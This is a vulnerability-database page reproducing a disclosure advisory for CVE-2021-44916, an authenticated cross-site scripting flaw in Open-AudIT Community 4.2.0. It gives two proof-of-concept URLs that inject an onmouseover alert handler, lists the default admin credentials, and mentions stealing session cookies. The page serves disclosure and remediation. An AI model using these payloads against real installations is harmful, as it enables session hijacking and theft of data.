Vulners
Lucene search
Open-AudIT Community 4.2.0 Cross Site Scripting
🗓️ 10 Jan 2022 00:00:00Reported by Dominic ClarkType 
packetstorm🔗 packetstormsecurity.com👁 272 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Open-AudIT Community 4.2.0 - Cross-Site Scripting Vulnerability | 10 Jan 202200:00 | – | zdt |
 | CVE-2021-44916 | 20 Dec 202114:39 | – | circl |
 | Opmantek Open-AudIT 跨站脚本漏洞 | 20 Dec 202100:00 | – | cnnvd |
 | CVE-2021-44916 | 20 Dec 202111:31 | – | cve |
 | CVE-2021-44916 | 20 Dec 202111:31 | – | cvelist |
 | Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated) | 10 Jan 202200:00 | – | exploitdb |
 | EUVD-2021-31714 | 3 Oct 202520:07 | – | euvd |
 | CVE-2021-44916 | 20 Dec 202112:15 | – | nvd |
 | Cross site scripting | 20 Dec 202112:15 | – | prion |
 | CVE-2021-44916 | 22 May 202518:55 | – | redhatcve |
10
`# Exploit Title: Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)
# Date: 01/11/2021
# Exploit Author: Dominic Clark (parzival)
# Vendor Homepage: https://opmantek.com/
# Software Link: https://www.open-audit.org/downloads.php
# Category: WebApps
# Version: <= 4.2.0
# Tested on: Windows 10
# CVE: CVE-2021-44916
# 1. Vendor Description
# Open-AudIT is an application to tell you exactly what is on your network, how it is configured and when it changes.
# Essentially, Open-AudIT is a database of information, that can be queried via a web interface.
# Open-AudIT will run on both Windows and Linux systems.
# 2. Technical Description
# There is an issue with link creation in the GUI with Open-AudIT Community.
# If a bad value is passed to the routine via a URL, javascript code can be executed.
# This requires the user be logged in to Open-AudIT Community to trigger.
# 3. Proof of Concept
# Step 1: Login to Open-AudIT via the login page (default credentials are admin/password)
# Step 2: Enter one of the following PoC URLs, this issue was observed to occur any time there is a file available to be imported: (e.g., http://localhost/open-audit/index.php/attributes/import)
Vulnerable URL 1: "http://localhost/open-audit/index.php/discoveries/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"
Vulnerable URL 2: "http://localhost/open-audit/index.php/credentials/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"
# Step 3: Observe that the payload successfully executes and a popup is displayed.
# This vulnerability can be exploited in conjuction with a social engineering attack to potentially obtain sensitive information such a users session cookie.
# 4. Remediation
# Apply the recommended workarounds and mitigations provided by Opmantek.
# https://community.opmantek.com/display/OA/Errata+-+4.2.0+and+earlier+Javascript+vulnerability
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Jan 2022 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.04458